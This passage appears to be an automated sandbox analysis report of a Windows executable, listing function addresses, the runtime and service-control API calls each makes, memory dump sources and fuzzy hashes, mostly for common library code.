                                                • SetServiceStatus.ADVAPI32(00000000,0036F574), ref: 00320270
                                                • SetServiceStatus.ADVAPI32(00000000,0036F574), ref: 00320299
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$Status$CtrlHandlerRegister
                                                • String ID:
                                                • API String ID: 1836899780-0
                                                • Opcode ID: f2ed50ab83c8c2dde20d37157e855ba38560741ffc672e757fdfb7c7e36ef9ba
                                                • Instruction ID: f26539ad2120e1e6b2f947bff7be7d721a0bf1ecfbe99bed66eb9a6c3db10abb
                                                • Opcode Fuzzy Hash: f2ed50ab83c8c2dde20d37157e855ba38560741ffc672e757fdfb7c7e36ef9ba
                                                • Instruction Fuzzy Hash: 4E515974D04288DFDB12CFA8E8896DDBBB4FF1A304F108129DA42A7361E7B15A49CF50
                                                Function 00358AA9 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 00358AC1
                                                  • Part of subcall function 003543F6: RtlFreeHeap.NTDLL(00000000,00000000,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?), ref: 0035440C
                                                  • Part of subcall function 003543F6: GetLastError.KERNEL32(?,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?,?), ref: 0035441E
                                                • _free.LIBCMT ref: 00358AD3
                                                • _free.LIBCMT ref: 00358AE5
                                                • _free.LIBCMT ref: 00358AF7
                                                • _free.LIBCMT ref: 00358B09
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 3f01edf01b17ad20612847348d3a9b85ca6a24ef42388892524a16d35a03ed5b
                                                • Instruction ID: 8361a14254b6a36961b03401461a91a302c57a760e56defa48f1dc8b79d155f1
                                                • Opcode Fuzzy Hash: 3f01edf01b17ad20612847348d3a9b85ca6a24ef42388892524a16d35a03ed5b
                                                • Instruction Fuzzy Hash: 05F04F36504200F7862BEB6DE586C1773DDEA00311B694C05FD08EB670CFA8FC898660
                                                Function 00328310 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 232memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 0032840D
                                                • _Allocate.LIBCONCRTD ref: 0032841F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateConcurrency::cancel_current_task
                                                • String ID: }h2$}h2
                                                • API String ID: 806954194-958364417
                                                • Opcode ID: 8e5061569ef25c7b8bf1eaf49467a9d2fdf12720116defc8e53e7fad990385b6
                                                • Instruction ID: 8ac5ab570d11fec184ab8258a63b72aa9f180d98f812be7da249dc4cda6c9a75
                                                • Opcode Fuzzy Hash: 8e5061569ef25c7b8bf1eaf49467a9d2fdf12720116defc8e53e7fad990385b6
                                                • Instruction Fuzzy Hash: 50B180B4E04219DFDB14CF98D980A9EFBB5FF49310F208299E919A7345D730A985CF61
                                                Function 0033B1A0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 211memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 0033B29D
                                                • _Allocate.LIBCONCRTD ref: 0033B2AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateConcurrency::cancel_current_task
                                                • String ID: W3$W3
                                                • API String ID: 806954194-1712538904
                                                • Opcode ID: 1b53baade5b77b8fe97cc6e2e4537f5debfa6827296973ef29c72fbaa14e3e67
                                                • Instruction ID: b5dede2d1a2ff7add06b305673043e4a0961c9e6981a925fbd05f854602c0739
                                                • Opcode Fuzzy Hash: 1b53baade5b77b8fe97cc6e2e4537f5debfa6827296973ef29c72fbaa14e3e67
                                                • Instruction Fuzzy Hash: 75A191B4E002189FDB18CF99D880AEEFBB5FF88310F208259E519A7355D730AA45CF61
                                                Function 0033A7B0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 211memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 0033A8AD
                                                • _Allocate.LIBCONCRTD ref: 0033A8BF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateConcurrency::cancel_current_task
                                                • String ID: mN3$mN3
                                                • API String ID: 806954194-447428758
                                                • Opcode ID: 21f8fb964a6989e1dfd79af324f85752de9197cdde66cd7b6c692b64e92ebba2
                                                • Instruction ID: 489178e693fbbb6c9dc9cc29cc8aea9366e395753d09a23bf267c0e35355ca17
                                                • Opcode Fuzzy Hash: 21f8fb964a6989e1dfd79af324f85752de9197cdde66cd7b6c692b64e92ebba2
                                                • Instruction Fuzzy Hash: BCA191B5E042189FDB18CF98D980AEEBBB5FF88310F208259E519B7355D730AA45CF61
                                                Function 0033AB00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 211memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 0033ABFD
                                                • _Allocate.LIBCONCRTD ref: 0033AC0F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateConcurrency::cancel_current_task
                                                • String ID: MQ3$MQ3
                                                • API String ID: 806954194-3531733306
                                                • Opcode ID: 1ef0993effad695a1fbd21b3992be9d6a6390791e3c69ad4af7bc341c9647538
                                                • Instruction ID: 2dc6a05c990d34450189cbcbc549a2eddacd0a789bc73e8efee178717d5a1f32
                                                • Opcode Fuzzy Hash: 1ef0993effad695a1fbd21b3992be9d6a6390791e3c69ad4af7bc341c9647538
                                                • Instruction Fuzzy Hash: 18A1A2B5E006189FDB18CF98D980ADEBBB5FF88310F208299E519A7355D730A945CF61
                                                Function 0033AE50 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 211memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 0033AF4D
                                                • _Allocate.LIBCONCRTD ref: 0033AF5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateConcurrency::cancel_current_task
                                                • String ID: -T3$-T3
                                                • API String ID: 806954194-1012538121
                                                • Opcode ID: cc0674c74e2ff598bb6332be815955fccbffd74168b2e006651a171a5b72efb3
                                                • Instruction ID: 1fca764bbbfe18e85eae071e1b03e135e2a0a9e0ed58dcef0cc08c0c0df54b6f
                                                • Opcode Fuzzy Hash: cc0674c74e2ff598bb6332be815955fccbffd74168b2e006651a171a5b72efb3
                                                • Instruction Fuzzy Hash: 33A1A1B5E002589FDB18CF99D880AEEBBB5FF88310F208259E519B7355D730AA45CF61
                                                Function 00357072 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID: *?
                                                • API String ID: 269201875-2564092906
                                                • Opcode ID: d13e61ce19c85bdbfa5b69b6412ba720244a744a13bb18cb461e608084e087e1
                                                • Instruction ID: 10b6baaedac78a048e3aac8803ead09fa86393f8e7f29cf4c0ce973b23d11d17
                                                • Opcode Fuzzy Hash: d13e61ce19c85bdbfa5b69b6412ba720244a744a13bb18cb461e608084e087e1
                                                • Instruction Fuzzy Hash: 0A615C75D04219AFCB16CFA8D8819EEFBF5EF48310F258169EC15EB310D635AE458B90
                                                Function 00356A37 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 170fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 003561CA: GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 00356212
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,00354752,?,?,?,0036CF90,0000002C,003547C3,?), ref: 00356B7D
                                                • GetLastError.KERNEL32 ref: 00356B87
                                                • __dosmaperr.LIBCMT ref: 00356BC6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
                                                • String ID: RG5
                                                • API String ID: 910155933-2045918765
                                                • Opcode ID: 11b3d9fbd6924f6fc6395c0b6dd20020daaf89ded322433a12d7333532825132
                                                • Instruction ID: a49abd111d2e09982571c55456e6a4bd0775eaf00a280f51792c4a1cb4ada71a
                                                • Opcode Fuzzy Hash: 11b3d9fbd6924f6fc6395c0b6dd20020daaf89ded322433a12d7333532825132
                                                • Instruction Fuzzy Hash: 1151D171900209ABDB13DFA5C806FEE7BB8EF46326F954055EC00BB2B2D7719A49C761
                                                Function 00313560 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00312400: __aulldiv.LIBCMT ref: 00312482
                                                • SHGetFolderPathA.SHELL32(00000000,00000000), ref: 003135F6
                                                • __aulldiv.LIBCMT ref: 003136F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv$FolderPath
                                                • String ID: @)$E)
                                                • API String ID: 3798299979-3004400368
                                                • Opcode ID: 3d4322ace386a027802c7000b9d5746cdc106755d47d27a02fc4950a22f2794d
                                                • Instruction ID: 8c923478dd5b284d359401da6375b6aada41094f77912a8fc8aab2c78e9af38f
                                                • Opcode Fuzzy Hash: 3d4322ace386a027802c7000b9d5746cdc106755d47d27a02fc4950a22f2794d
                                                • Instruction Fuzzy Hash: 345107B1E002289BDB69DF55CC85BDAB7B5FB89310F0181E9E50CA7390D7746E858F90
                                                Function 00357B3E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 99COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 003578E8: GetOEMCP.KERNEL32(00000000,00357B59,?,?,#5,00350D23,?), ref: 00357913
                                                • _free.LIBCMT ref: 00357BB6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID: #5$`6
                                                • API String ID: 269201875-3890981038
                                                • Opcode ID: 3558cdc38fa7616e310d510380bd91f7e697d4cf142646daa540feaad83260be
                                                • Instruction ID: a5981e75846e1eea2985d7c85bec0fd77a49c4887b7bbbf6db4092a8a98ac1c9
                                                • Opcode Fuzzy Hash: 3558cdc38fa7616e310d510380bd91f7e697d4cf142646daa540feaad83260be
                                                • Instruction Fuzzy Hash: D131B071904209AFCB12EFA8E840E9E77B5FF44315F1141AAFD109B2B1EB329D59CB60
                                                Function 00355494 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: c2b07f37c3ce205324c2a8086c1d99291ebed5f07273467f24d10bab3eeb6b9f
                                                • Instruction ID: 01568cfb07b2a2d29ce98b5c08ac75e267d630eba7da1055129f0f6a3c73603f
                                                • Opcode Fuzzy Hash: c2b07f37c3ce205324c2a8086c1d99291ebed5f07273467f24d10bab3eeb6b9f
                                                • Instruction Fuzzy Hash: B6B15831900A859FDB128F28C8A1FAEBBF5EF55312F254169EC45EF261D634AD09CB60
                                                Function 0033D217 Relevance: 6.2, APIs: 4, Instructions: 215COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5249936d5fc0839d06c9a7641786ecd56a650a1b96760fecdadd962e7299ba6
                                                • Instruction ID: ce6ef900ae27d123d45e76ae555c63d27b65f8e1d202fa14dacc66c288237ada
                                                • Opcode Fuzzy Hash: e5249936d5fc0839d06c9a7641786ecd56a650a1b96760fecdadd962e7299ba6
                                                • Instruction Fuzzy Hash: BDC1CE74D092A88BDB62CF289C947EABBB1AF5A304F0482D9D88D6B251D7305EC5CF51
                                                Function 0034AEB0 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: b7091ecb9d8494a40df3d9d119c816f809b4eb41555b95cfa6ca960fa530d5df
                                                • Instruction ID: 1a8a223b11830c9a4141bc54c4a8b67f532b30a186ec1dc0c4bf4475bccd5155
                                                • Opcode Fuzzy Hash: b7091ecb9d8494a40df3d9d119c816f809b4eb41555b95cfa6ca960fa530d5df
                                                • Instruction Fuzzy Hash: AD51B1B2645A02AFDB279F54D841BAAB7E4EF04311F15402EE8118F691E731FD88DB92
                                                Function 0035D87E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 0035D94E
                                                • _free.LIBCMT ref: 0035D977
                                                • SetEndOfFile.KERNEL32(00000000,00359DE8,00000000,?,?,?,?,?,?,?,?,00359DE8,?,00000000), ref: 0035D9A9
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00359DE8,?,00000000,?,?,?,?,?), ref: 0035D9C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFileLast
                                                • String ID:
                                                • API String ID: 1547350101-0
                                                • Opcode ID: 01e0e000c5ca7eb26c0fb1f6fbf8cedc2ea0594ebd8c93924658ba404804a862
                                                • Instruction ID: 6a439c3731746b48af1de6172f3d0a0bdaffabf21f5cbc5e8714a892b75de393
                                                • Opcode Fuzzy Hash: 01e0e000c5ca7eb26c0fb1f6fbf8cedc2ea0594ebd8c93924658ba404804a862
                                                • Instruction Fuzzy Hash: 8B41C172900605AADB23ABA8CC02F9E3769EF45362F250510FC14EF2B1EB34D94C8761
                                                Function 00356FA3 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00350AF1: _free.LIBCMT ref: 00350AFF
                                                  • Part of subcall function 00357FC8: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0035D570,?,00000000,00000000), ref: 00358074
                                                • GetLastError.KERNEL32 ref: 0035700B
                                                • __dosmaperr.LIBCMT ref: 00357012
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00357051
                                                • __dosmaperr.LIBCMT ref: 00357058
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
